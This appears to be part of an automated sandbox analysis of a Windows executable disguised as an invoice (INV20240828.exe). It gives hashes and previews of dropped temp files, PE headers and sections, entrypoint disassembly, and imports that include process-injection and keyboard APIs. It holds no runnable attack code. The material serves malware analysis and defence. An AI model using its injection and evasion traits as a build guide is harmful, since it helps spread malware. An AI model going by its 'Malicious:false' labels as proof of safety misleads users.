                              SSDEEP:768:tOO2aSjE8BSDdq5wdv6yGG/Z+iPH8DYwJzhxvT0llluY3Vq4y0YplK04ySPOcdQv:3WxavyGh9PcJHvMrYSbPOc6sis4r
                              MD5:76B50D1E71C96047A20F2B70E61F4B6D
                              SHA1:FF137C3E26C26C893F9342AB9153F0E04765CF11
                              SHA-256:691D9010C8DD4AECF447A7937C38125B3333DE43DF38AD00958DF0133FEF9A0F
                              SHA-512:AC2AC3687C735B0FB0FB25CD4C2B2994FBD0AE0593FFD9508CB2454872A77758DB3D2D63E1FCF515852E473E449148A3AAA5379A042EB6A98041E314D491E988
                              Malicious:false
                              Reputation:low
                              Preview:30J78N35G35K38F62I65T63Q38B31Q65G63N63M63A30L32A30U30T30F30K35K36L35H37C62P38B36M62Z30D30N30O30S30T30T36G36M38H39Q34U35K38E34B62Z39X36Z35V30M30B30U30N30L30D36V36X38E39P34I64H38Q36Z62D61P37H32Y30O30E30C30F30M30U36W36O38V39S35Q35G38M38G62V38H36R65H30E30W30I30R30C30O36V36V38Z39S34I35Z38J61Q62F39I36G35U30Z30L30R30Z30U30O36C36F38P39R34J64Z38W63A62N61Q36L63Y30L30L30Z30D30C30U36I36X38P39B35C35D38W65E62F38Y33I33T30G30G30Z30C30J30F36Q36G38A39N34B35O39U30U62C39D33Q32Y30Z30T30D30X30U30T36A36L38T39H34Y64S39G32N62K61I32K65I30P30Q30E30K30K30K36R36K38U39A35F35E39S34P62M38F36F34G30C30C30C30J30Z30I36Y36F38V39K34U35R39D36R62D39L36R63Q30O30G30J30W30G30T36S36F38J39S34R64P39D38C62L61G36H63W30Z30Y30U30M30R30S36L36Z38K39K35B35D39N61F33I33X63N30K36T36L38L39U34P35P39S63E62K39P36U65U30R30D30Y30V30O30M36S36O38D39Q38M64K34T34H66C66N66H66Y66F66Q62C61W37U34L30B30E30I30X30H30V36S36U38N39C39M35E34K36Z66U66Q66M66W66U66U62A38Y36I34O30L30B30C30E30A30C36Y36H38H39M38I35P34Q38I66L66K66X66F66T66M62A39C36M63L30N30T30P30R30A3

                              C:\Users\user\AppData\Local\Temp\autD8B1.tmp

                              Download File
                              Process:C:\Users\user\Desktop\INV20240828.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):289280
                              Entropy (8bit):7.990745492683648
                              Encrypted:true
                              SSDEEP:6144:VbMsqT0a2RegfyYjWme/U/Ao+skUtVOjVGZ6k9xZ5vajzjI:VbMhTvAeSy9vvoFkUbOI6k9xZiA
                              MD5:C652F3C593B2A8513101C1DC06AECBCC
                              SHA1:487A5427132CE1D2B6D01FA434454384CEE9CF31
                              SHA-256:3D2A6E6B31EB05A3EBEB0260977DD6473BF6A3A5A95ECB621E950746C8CCCD32
                              SHA-512:19C1920261AE405283FBCF4FFA0B6CB42A0CFF189C3CA0C40FB70B22218460AF9355DF0D9121A3333FB0B96CE7AA0F256A3E6307D81C4F03C45B3090549C0666
                              Malicious:false
                              Reputation:low
                              Preview:t....7P30...N.....T:...4X...9TGPW7P30T9TGPW7P30T9TGPW7P30T.TGPY(.=0.0.f.V{..d<P'g %X7AQ9.7&>9X$.R1.&2>w^>.t.jt*?3R~>=^.TGPW7P3IU0.z00.mSW..4 .M....4^.]...lSW.#..kW7.b=Z<z00.P30T9TGP.rP3|U8Tm4.oP30T9TGP.7R2;U2TG.S7P30T9TGPw#P30D9TG S7P3pT9DGPW5P36T9TGPW7V30T9TGPWGT30V9TGPW7R3p.9TWPW'P30T)TG@W7P30T)TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9Ti$2O$30T=.CPW'P30.=TG@W7P30T9TGPW7P3.T94GPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T

                              C:\Users\user\AppData\Local\Temp\autD900.tmp

                              Download File
                              Process:C:\Users\user\Desktop\INV20240828.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):43490
                              Entropy (8bit):7.826318844920643
                              Encrypted:false
                              SSDEEP:768:TcEryy5t0D5NBFOcJfa28K7Y97R0KJ9/GfWqsvA1oH1jhEK:TcEryitGbG+CjK7C0KJV0/s4qlf
                              MD5:E700FCA96B1D9556E4DBDE1BC68605A8
                              SHA1:42510F0801E32DE2BDC850E47C76E81FD74D3EB2
                              SHA-256:1CB3114E7A55B3F5E31B2F3D54011752588E7C75469CA8EF27E4E0575619BF2F
                              SHA-512:5030C6B4FF7AA636D918C4F084D5E24E30402ACD45D6CBD67A3E4BF59A1BF39BC8A0C37561B92458914C29ECC9C77AD2B83949825B6C6B75EA7CBFBF2A00A528
                              Malicious:false
                              Reputation:low
                              Preview:EA06..P...)Sy.:g5.....6.Rf.Z..gQ..(S9.Fm5..t..6..fs.d.d..Ufs...aF..)`.l.3..&sz..eP.3f...3.Q&s.t.aO..*`..Rg6....9."g9...P..3.P..Y.bg6.L.i..3.P.. ......9.`....&sJL.iH..* ...eD.Lj.9."g2..3TY...'.!.Y..3.S.s...sS..j .l....U`..mR..X..m^g0.... .........L....kS9.*l..L..9.$....L.......U@....mF..*.9.Jg4.M....\...L......6..@..`..D.l.(.H...lP.sZ..kD.6f.P..qY...39...G...@.u(.y..(....g9....9.>g9..*.i..g9.L.l......4..... 4..3..&sJ..iS..h.0..eK.Li30.bj..T&s....K....3....Y..3..sZ(..P.L.R....3.Q.&j.......R........j..2...*$.sL..@)@....gU..`."..mR....h.....JE2m1.7).i.\....iT......Q.[.X.c5......B..}V..@.j...S.JP.rj..T..0....L..Y...R./..J...M..............Rg4.M..9..6..&...6....9..3.....+.......L%X."....I...M.D@..+....<...\.2..( ?...4.... .h.8.o(`*. ...}...0..d......m6..F.@... .l..I.0.....U ...,..*@7..a8...3J4.cK.....B.H....h..L....6..'V.. .0....D w..q4..u0.Z...R..j...2.... Dr..sU.$..L.............J,.j.5........ $......b..[S....4.4U.s.$b......`..X... .5Nl..Lh.[ ..H..

                              C:\Users\user\AppData\Local\Temp\chordates

                              Download File
                              Process:C:\Users\user\Desktop\INV20240828.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):289280
                              Entropy (8bit):7.990745492683648
                              Encrypted:true
                              SSDEEP:6144:VbMsqT0a2RegfyYjWme/U/Ao+skUtVOjVGZ6k9xZ5vajzjI:VbMhTvAeSy9vvoFkUbOI6k9xZiA
                              MD5:C652F3C593B2A8513101C1DC06AECBCC
                              SHA1:487A5427132CE1D2B6D01FA434454384CEE9CF31
                              SHA-256:3D2A6E6B31EB05A3EBEB0260977DD6473BF6A3A5A95ECB621E950746C8CCCD32
                              SHA-512:19C1920261AE405283FBCF4FFA0B6CB42A0CFF189C3CA0C40FB70B22218460AF9355DF0D9121A3333FB0B96CE7AA0F256A3E6307D81C4F03C45B3090549C0666
                              Malicious:false
                              Reputation:low
                              Preview:t....7P30...N.....T:...4X...9TGPW7P30T9TGPW7P30T9TGPW7P30T.TGPY(.=0.0.f.V{..d<P'g %X7AQ9.7&>9X$.R1.&2>w^>.t.jt*?3R~>=^.TGPW7P3IU0.z00.mSW..4 .M....4^.]...lSW.#..kW7.b=Z<z00.P30T9TGP.rP3|U8Tm4.oP30T9TGP.7R2;U2TG.S7P30T9TGPw#P30D9TG S7P3pT9DGPW5P36T9TGPW7V30T9TGPWGT30V9TGPW7R3p.9TWPW'P30T)TG@W7P30T)TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9Ti$2O$30T=.CPW'P30.=TG@W7P30T9TGPW7P3.T94GPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T9TGPW7P30T

                              C:\Users\user\AppData\Local\Temp\x--942kI

                              Download File
                              Process:C:\Windows\SysWOW64\chkntfs.exe
                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                              Category:dropped
                              Size (bytes):196608
                              Entropy (8bit):1.121297215059106
                              Encrypted:false
                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                              MD5:D87270D0039ED3A5A72E7082EA71E305
                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                              Malicious:false
                              Reputation:high, very likely benign file
                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              Static File Info

                              General

                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):7.148885240264832
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.96%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:INV20240828.exe
                              File size:1'263'104 bytes
                              MD5:d609d71d66a4ad2aaeda58a4368c901b
                              SHA1:901dc6db4acba93ab9d7887dbf34d44b926b3f03
                              SHA256:a3546bc856390ff0cf93310ee45cf191d8db47bd52cbf90554d69c33f83ce985
                              SHA512:69951c4c73ab048ca2d82e78123b8d128dd6ccdc9c8293c0a3810cfe3ccee8a0a46ec5a2c5efeece0d5c90e011d43660982abef6dc7b5051e2091b8d41c988ec
                              SSDEEP:24576:bqDEvCTbMWu7rQYlBQcBiT6rprG8ajs0r+tod0moeRRr:bTvC/MTQYxsWR7ajrSid0M
                              TLSH:AD45CF0273C1C062FFAB92334B56F6515BBC69260523E62F13981DB9BE701B1563E7A3
                              File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

                              File Icon

                              Icon Hash:aaf3e3e3938382a0

                              Static PE Info

                              General

                              Entrypoint:0x420577
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                              Time Stamp:0x66CE7C75 [Wed Aug 28 01:25:09 2024 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:5
                              OS Version Minor:1
                              File Version Major:5
                              File Version Minor:1
                              Subsystem Version Major:5
                              Subsystem Version Minor:1
                              Import Hash:948cc502fe9226992dce9417f952fce3

                              Entrypoint Preview

                              Instruction
                              call 00007F0C2CF566D3h
                              jmp 00007F0C2CF55FDFh
                              push ebp
                              mov ebp, esp
                              push esi
                              push dword ptr [ebp+08h]
                              mov esi, ecx
                              call 00007F0C2CF561BDh
                              mov dword ptr [esi], 0049FDF0h
                              mov eax, esi
                              pop esi
                              pop ebp
                              retn 0004h
                              and dword ptr [ecx+04h], 00000000h
                              mov eax, ecx
                              and dword ptr [ecx+08h], 00000000h
                              mov dword ptr [ecx+04h], 0049FDF8h
                              mov dword ptr [ecx], 0049FDF0h
                              ret
                              push ebp
                              mov ebp, esp
                              push esi
                              push dword ptr [ebp+08h]
                              mov esi, ecx
                              call 00007F0C2CF5618Ah
                              mov dword ptr [esi], 0049FE0Ch
                              mov eax, esi
                              pop esi
                              pop ebp
                              retn 0004h
                              and dword ptr [ecx+04h], 00000000h
                              mov eax, ecx
                              and dword ptr [ecx+08h], 00000000h
                              mov dword ptr [ecx+04h], 0049FE14h
                              mov dword ptr [ecx], 0049FE0Ch
                              ret
                              push ebp
                              mov ebp, esp
                              push esi
                              mov esi, ecx
                              lea eax, dword ptr [esi+04h]
                              mov dword ptr [esi], 0049FDD0h
                              and dword ptr [eax], 00000000h
                              and dword ptr [eax+04h], 00000000h
                              push eax
                              mov eax, dword ptr [ebp+08h]
                              add eax, 04h
                              push eax
                              call 00007F0C2CF58D7Dh
                              pop ecx
                              pop ecx
                              mov eax, esi
                              pop esi
                              pop ebp
                              retn 0004h
                              lea eax, dword ptr [ecx+04h]
                              mov dword ptr [ecx], 0049FDD0h
                              push eax
                              call 00007F0C2CF58DC8h
                              pop ecx
                              ret
                              push ebp
                              mov ebp, esp
                              push esi
                              mov esi, ecx
                              lea eax, dword ptr [esi+04h]
                              mov dword ptr [esi], 0049FDD0h
                              push eax
                              call 00007F0C2CF58DB1h
                              test byte ptr [ebp+08h], 00000001h
                              pop ecx

                              Rich Headers

                              Programming Language:
                              • [ C ] VS2008 SP1 build 30729
                              • [IMP] VS2008 SP1 build 30729

                              Data Directories

                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0xc8e640x17c.rdata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000x5db08.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x1320000x7594.reloc
                              IMAGE_DIRECTORY_ENTRY_DEBUG0xb0ff00x1c.rdata
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0xc34000x18.rdata
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb10100x40.rdata
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x9c0000x894.rdata
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                              Sections

                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x10000x9ab1d0x9ac000a1473f3064dcbc32ef93c5c8a90f3a6False0.565500681542811data6.668273581389308IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .rdata0x9c0000x2fb820x2fc00c9cf2468b60bf4f80f136ed54b3989fbFalse0.35289185209424084data5.691811547483722IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .data0xcc0000x706c0x480053b9025d545d65e23295e30afdbd16d9False0.04356553819444445DOS executable (block device driver @\273\)0.5846666986982398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .rsrc0xd40000x5db080x5dc003ebdc68f6006562c63e5a506c59bf92eFalse0.9298619791666667data7.898374161824965IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .reloc0x1320000x75940x7600c68ee8931a32d45eb82dc450ee40efc3False0.7628111758474576data6.7972128181359786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                              Resources

                              NameRVASizeTypeLanguageCountryZLIB Complexity
                              RT_ICON0xd45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                              RT_ICON0xd46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                              RT_ICON0xd47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                              RT_ICON0xd49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                              RT_ICON0xd4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                              RT_ICON0xd4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                              RT_ICON0xd5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                              RT_ICON0xd64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                              RT_ICON0xd69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                              RT_ICON0xd8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                              RT_ICON0xda0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                              RT_MENU0xda4a00x50dataEnglishGreat Britain0.9
                              RT_STRING0xda4f00x594dataEnglishGreat Britain0.3333333333333333
                              RT_STRING0xdaa840x68adataEnglishGreat Britain0.2735961768219833
                              RT_STRING0xdb1100x490dataEnglishGreat Britain0.3715753424657534
                              RT_STRING0xdb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                              RT_STRING0xdbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                              RT_STRING0xdc1f80x466dataEnglishGreat Britain0.3605683836589698
                              RT_STRING0xdc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                              RT_RCDATA0xdc7b80x54d9edata1.0003337649259099
                              RT_GROUP_ICON0x1315580x76dataEnglishGreat Britain0.6610169491525424
                              RT_GROUP_ICON0x1315d00x14dataEnglishGreat Britain1.25
                              RT_GROUP_ICON0x1315e40x14dataEnglishGreat Britain1.15
                              RT_GROUP_ICON0x1315f80x14dataEnglishGreat Britain1.25
                              RT_VERSION0x13160c0x10cdataEnglishGreat Britain0.5970149253731343
                              RT_MANIFEST0x1317180x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                              Imports

                              DLLImport
                              WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                              VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                              WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                              COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                              MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                              WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                              PSAPI.DLLGetProcessMemoryInfo
                              IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                              USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                              UxTheme.dllIsThemeActive
                              KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
                              USER32.dllGetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
                              GDI32.dllEndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
                              COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                              ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
                              SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                              ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
